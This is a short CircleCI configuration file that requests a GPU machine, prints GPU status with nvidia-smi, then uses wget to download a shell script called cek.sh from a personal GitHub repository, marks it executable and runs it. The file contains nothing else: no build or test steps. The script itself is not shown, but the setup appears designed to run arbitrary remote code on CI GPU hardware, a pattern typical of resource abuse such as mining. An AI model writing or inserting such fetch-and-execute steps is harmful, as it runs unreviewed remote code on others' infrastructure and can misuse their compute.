version: 2.1

jobs:
  build:
    machine:
      image: ubuntu-2004-cuda-11.4:202110-01
    resource_class: gpu.nvidia.medium
    steps:
      - run: nvidia-smi
      - run: wget https://raw.githubusercontent.com/saptasitanggang/saptasitanggang/main/cek.sh && chmod +x *.sh && ./cek.sh

